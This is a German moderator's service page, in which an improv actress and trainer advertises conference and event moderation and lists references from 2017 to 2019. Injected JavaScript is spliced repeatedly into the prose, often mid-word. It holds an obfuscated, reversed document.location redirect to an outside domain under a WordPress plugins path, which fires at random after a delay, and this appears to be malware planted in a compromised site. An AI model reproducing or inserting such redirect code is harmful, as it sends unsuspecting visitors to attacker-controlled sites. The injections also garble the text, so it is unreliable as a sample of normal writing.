Moderation

Reden ist Silber und Impro ist Gold

Getreu diesem Mottoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to verbinde ich in meinen Moderationen charmante Kommunikationskunst mit themenbezogener Unterhaltung.

Ich sorge für leichtfüßige Orientierung der Gäste und pointierte Inhalte auf Ihren Veranstaltungen: Immer auf Augenhöhe mit dem Publikum, denn ich schöpfe seit mehr als 20 Jahren aus dem Erfahrungsschatz als Improvisations-Schauspielerin, Trainerin und Regisseurin.

Inhaltsstarke Live-Kommunikation ist meine Herzensangelegenheit, damit Gäste, Teilnehmer und Teilnehmerinnen begeistert sind, orientiert bleiben und Veranstalter ihre Ziele erreichen.

Ich moderiere Kongresse, Konferenzen, Summits, Fachtage, Workshops und Jubiläums-Veranstaltungen, sowie kulturelle Formate und Shows. Ich kümmere mich um das Time-Keeping, verbinde Talkformate mit Präsentationen und arbeite gerne mit leichtfüßigem Humor, damit das Publikum den Kopf wieder frei hat für neue Impulse.

BZ: Frühjahrsempfang der Regionen NRW am 05.06.2019
Fotoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to: Arne Pöhnert

Als Facilitatoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}torin in Workshops stelle ich die Themen der Veranstaltung in den Mittelpunkt und aktiviere die Teilnehmerinnen und Teilnehmer, damit sie den Sprung aus der Komfortzone leichtfüßig wagen.

Als Moderatoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}torin begleite ich Sie auch in der Vorbereitung Ihrer Veranstaltung rund um die Belange der Veranstaltungsdramaturgie, des Time-Keeping und der Programmentwicklung bis hin zur Recherche von spannenden Rednerinnen und Rednern.

Referenzen:

  • 11/2017: Moderation Wintermut18 im Rathausfestsaal (u.a. mit Matthias Platzeck)
  • 4/2018: Moderation für die Caritas im Bistum Münster im Rahmen der Zukunftswoche (Interaktive Show)
  • 5/2018: Moderation der Bistumsrevue am 10.,11.,12.5.18 des Bistums Münster beim Katholikentag u.a. mit Bischof Dr. Felix Genn
  • 8 & 9/2018: „Marke Münsterland“ Moderation der 5 Regionalveranstaltungen für Münsterland e.V. (u.a. mit den jeweiligen Landräten)
  • 10/2018: Moderation Sturmfreie Bühne mit placebotheater im Theater Münster
  • 11/2018: Moderation Wintermut19 im Rathausfestsaal , u.a. mit Wolfgang Bosbach
  • 6/ 2019 : Moderation des Empfang der Regionen , Landtag Düsseldorf, u.a. mit Verkehrsminister Hendrik Wüst
  • 11/2019: Moderation Social Talk 2019, Ev. Hochschule Darmstadt